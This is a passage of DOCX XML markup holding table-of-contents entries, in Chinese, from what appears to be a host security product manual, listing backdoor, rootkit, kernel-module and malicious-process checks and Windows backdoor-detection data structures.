              <w:t>13.1 检查功能：DPKG-based应用后门检查、RPM-based应用后门检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166302 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>419</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B4756CC" w14:textId="14BFC5D5" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166303" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.2 检查功能：磁盘MBR检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166303 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>421</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AD99665" w14:textId="6E17115A" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166304" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.3 检查功能：动态链接库检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166304 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>423</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="486B62B4" w14:textId="6E717A7B" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166305" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.4 检查功能：基本命令检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166305 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>424</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AB66E34" w14:textId="6A4FAB80" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166306" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.5 检查功能：已知rootkit检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166306 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>426</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23AEA06D" w14:textId="00BA4A91" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166307" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.6 检查功能：系统内核模块检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166307 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>428</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D4D3FC6" w14:textId="351DBADD" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166308" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.6.1 缺失模块检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166308 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>428</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17948864" w14:textId="4B5B88A4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166309" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.6.2 恶意内核模块</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="384128BD" w14:textId="043E25A6" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166310" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.7 检查功能：计划任务检查 \ 网络状态检查\用户状态检查系统文件状态检查\进程状态检查</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166310 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>430</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36C4AE48" w14:textId="3C9C7962" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166311" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.8 恶意进程</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166311 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>432</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="325ECEE8" w14:textId="4936BDE8" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166312" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14 附录2 Windows后门检测-查询结果-data数据结构</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166312 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A347072" w14:textId="4E02F8C4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166313" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1 后门类型：可疑进程</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48CAC145" w14:textId="3385F127" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166314" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1.1 item数据结构</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166314 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>435</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="256557A6" w14:textId="20D4440D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166315" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2 后门类型：可疑线程</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>438</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BE03E24" w14:textId="6C508789" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166316" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2.1 thread_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24BCC5D1" w14:textId="412395AD" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166317" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2.2 process_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
